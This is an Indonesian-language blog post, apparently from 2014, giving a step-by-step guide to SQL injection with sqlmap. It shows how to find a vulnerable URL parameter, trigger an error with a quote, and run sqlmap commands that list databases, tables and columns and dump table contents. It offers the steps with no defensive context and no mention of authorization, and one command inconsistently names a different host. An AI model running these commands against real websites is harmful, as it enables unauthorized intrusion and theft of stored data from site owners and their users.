Kamis, 11 September 2014

How to use SQLMap


Temukan url yang vulnerabel
http://www.site.com/section.php?id=51

tambahkan tanda kutip dibelakang parameter untuk mendapatkan error
http://www.site.com/section.php?id=51'

Jalankan SQLMap
python sqlmap.py -u "http://www.site.com/section.php?id=51"

Mendapatkan database
python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

Menemukan tabel dalam database
python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D [database name]

Mendapatkan kolom dari tabel
python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D [database name] -T [table]

Mendapatkan data dari tabel
python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D [database name] -T [table]

Ditulis Oleh : Unknown // 02.11
Kategori:

0 komentar:

 
Diberdayakan oleh Blogger.